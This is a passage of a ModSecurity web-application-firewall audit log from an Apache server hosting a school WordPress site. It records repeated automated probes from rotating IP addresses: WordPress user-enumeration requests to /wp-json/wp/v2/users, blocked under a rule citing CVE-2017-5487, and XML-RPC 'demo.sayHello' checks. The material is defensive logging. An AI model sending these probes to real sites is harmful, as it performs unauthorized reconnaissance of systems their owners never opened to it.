Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e2fa4743-Z-- --7373ba56-A-- [09/May/2025:23:17:49 +0700] aB4qrVoC-7ITMWTA_c9fIQAAANQ 103.236.140.4 57406 103.236.140.4 8181 --7373ba56-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.194.173 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.194.173 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --7373ba56-C-- demo.sayHello --7373ba56-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --7373ba56-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746807469799150 5441 (- - -) Stopwatch2: 1746807469799150 5441; combined=4086, p1=530, p2=3328, p3=30, p4=34, p5=101, sr=74, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7373ba56-Z-- --e6fbf052-A-- [09/May/2025:23:19:14 +0700] aB4rAlqQ1nOVx9fWpZSxgQAAAAk 103.236.140.4 57426 103.236.140.4 8181 --e6fbf052-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.179.159 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.179.159 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --e6fbf052-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e6fbf052-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746807554641898 3436 (- - -) Stopwatch2: 1746807554641898 3436; combined=1434, p1=480, p2=923, p3=0, p4=0, p5=31, sr=92, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e6fbf052-Z-- --17af256f-A-- [09/May/2025:23:19:18 +0700] aB4rBlqQ1nOVx9fWpZSxgwAAAAg 103.236.140.4 57430 103.236.140.4 8181 --17af256f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.179.159 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.179.159 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --17af256f-C-- demo.sayHello --17af256f-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --17af256f-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746807558844337 5484 (- - -) Stopwatch2: 1746807558844337 5484; combined=4067, p1=516, p2=3336, p3=28, p4=33, p5=91, sr=75, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --17af256f-Z-- --289bfb16-A-- [09/May/2025:23:24:38 +0700] aB4sRloC-7ITMWTA_c9fNQAAAMg 103.236.140.4 57506 103.236.140.4 8181 --289bfb16-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.87.57 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.87.57 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --289bfb16-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --289bfb16-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746807878422011 2874 (- - -) Stopwatch2: 1746807878422011 2874; combined=1289, p1=454, p2=805, p3=0, p4=0, p5=30, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --289bfb16-Z-- --6d5b1e34-A-- [09/May/2025:23:24:42 +0700] aB4sSloC-7ITMWTA_c9fNgAAANM 103.236.140.4 57510 103.236.140.4 8181 --6d5b1e34-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.87.57 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.87.57 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --6d5b1e34-C-- demo.sayHello --6d5b1e34-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --6d5b1e34-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746807882681979 6473 (- - -) Stopwatch2: 1746807882681979 6473; combined=4698, p1=585, p2=3828, p3=33, p4=34, p5=123, sr=98, sw=95, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6d5b1e34-Z-- --b7929e51-A-- [09/May/2025:23:37:09 +0700] aB4vNVoC-7ITMWTA_c9fUQAAAMY 103.236.140.4 57634 103.236.140.4 8181 --b7929e51-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.171.34 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.171.34 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --b7929e51-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b7929e51-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746808629666909 2975 (- - -) Stopwatch2: 1746808629666909 2975; combined=1351, p1=463, p2=859, p3=0, p4=0, p5=29, sr=97, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b7929e51-Z-- --f8172d1e-A-- [09/May/2025:23:37:12 +0700] aB4vOFqQ1nOVx9fWpZSxhwAAAAY 103.236.140.4 57638 103.236.140.4 8181 --f8172d1e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.171.34 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.171.34 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --f8172d1e-C-- demo.sayHello --f8172d1e-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --f8172d1e-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746808632087821 5255 (- - -) Stopwatch2: 1746808632087821 5255; combined=3957, p1=526, p2=3212, p3=29, p4=33, p5=93, sr=71, sw=64, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f8172d1e-Z-- --e5031372-A-- [09/May/2025:23:38:10 +0700] aB4vcloC-7ITMWTA_c9fVQAAAMQ 103.236.140.4 57644 103.236.140.4 8181 --e5031372-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 45.201.10.240 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.201.10.240 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --e5031372-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e5031372-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746808690235959 2942 (- - -) Stopwatch2: 1746808690235959 2942; combined=1323, p1=481, p2=812, p3=0, p4=0, p5=30, sr=101, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e5031372-Z-- --e4f60f62-A-- [09/May/2025:23:38:14 +0700] aB4vdloC-7ITMWTA_c9fVwAAAM4 103.236.140.4 57648 103.236.140.4 8181 --e4f60f62-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 45.201.10.240 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.201.10.240 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --e4f60f62-C-- demo.sayHello --e4f60f62-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --e4f60f62-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746808694179822 4727 (- - -) Stopwatch2: 1746808694179822 4727; combined=3682, p1=459, p2=3025, p3=22, p4=24, p5=89, sr=68, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e4f60f62-Z-- --aa99c416-A-- [09/May/2025:23:38:44 +0700] aB4vlFoC-7ITMWTA_c9fWgAAANE 103.236.140.4 57656 103.236.140.4 8181 --aa99c416-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 45.201.10.79 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.201.10.79 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --aa99c416-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --aa99c416-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746808724871615 2952 (- - -) Stopwatch2: 1746808724871615 2952; combined=1349, p1=460, p2=859, p3=0, p4=0, p5=30, sr=82, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --aa99c416-Z-- --48948b54-A-- [09/May/2025:23:38:49 +0700] aB4vmVoC-7ITMWTA_c9fXAAAAM0 103.236.140.4 57660 103.236.140.4 8181 --48948b54-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 45.201.10.79 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.201.10.79 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --48948b54-C-- demo.sayHello --48948b54-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --48948b54-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746808729284809 6481 (- - -) Stopwatch2: 1746808729284809 6481; combined=4611, p1=616, p2=3754, p3=39, p4=44, p5=95, sr=81, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --48948b54-Z-- --9b753e4e-A-- [09/May/2025:23:39:36 +0700] aB4vyFoC-7ITMWTA_c9fXwAAAMo 103.236.140.4 57670 103.236.140.4 8181 --9b753e4e-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.94.14.127 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.94.14.127 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --9b753e4e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9b753e4e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746808776847709 2834 (- - -) Stopwatch2: 1746808776847709 2834; combined=1247, p1=449, p2=768, p3=0, p4=0, p5=30, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9b753e4e-Z-- --ab6f7147-A-- [09/May/2025:23:39:41 +0700] aB4vzVoC-7ITMWTA_c9fYAAAAMk 103.236.140.4 57674 103.236.140.4 8181 --ab6f7147-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.94.14.127 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.94.14.127 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --ab6f7147-C-- demo.sayHello --ab6f7147-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --ab6f7147-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746808781536084 4944 (- - -) Stopwatch2: 1746808781536084 4944; combined=3988, p1=445, p2=3313, p3=28, p4=31, p5=98, sr=93, sw=73, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ab6f7147-Z-- --f3e3d642-A-- [09/May/2025:23:42:14 +0700] aB4wZlqQ1nOVx9fWpZSxiQAAAAo 103.236.140.4 57692 103.236.140.4 8181 --f3e3d642-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.179.243 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.179.243 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --f3e3d642-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f3e3d642-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746808934470963 3024 (- - -) Stopwatch2: 1746808934470963 3024; combined=1357, p1=472, p2=855, p3=0, p4=0, p5=29, sr=105, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f3e3d642-Z-- --19e1cd44-A-- [09/May/2025:23:42:20 +0700] aB4wa1qQ1nOVx9fWpZSxiwAAABE 103.236.140.4 57696 103.236.140.4 8181 --19e1cd44-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.179.243 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.179.243 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --19e1cd44-C-- demo.sayHello --19e1cd44-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --19e1cd44-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746808939996216 6726 (- - -) Stopwatch2: 1746808939996216 6726; combined=5361, p1=570, p2=3728, p3=32, p4=35, p5=512, sr=82, sw=484, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --19e1cd44-Z-- --347cd805-A-- [09/May/2025:23:45:02 +0700] aB4xDloC-7ITMWTA_c9fawAAAMY 103.236.140.4 57730 103.236.140.4 8181 --347cd805-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.118.213 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.118.213 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --347cd805-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --347cd805-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746809102024139 2192 (- - -) Stopwatch2: 1746809102024139 2192; combined=912, p1=333, p2=560, p3=0, p4=0, p5=19, sr=53, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --347cd805-Z-- --1a80eb77-A-- [09/May/2025:23:45:05 +0700] aB4xEVoC-7ITMWTA_c9fbQAAAME 103.236.140.4 57734 103.236.140.4 8181 --1a80eb77-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.118.213 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.118.213 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --1a80eb77-C-- demo.sayHello --1a80eb77-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --1a80eb77-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file 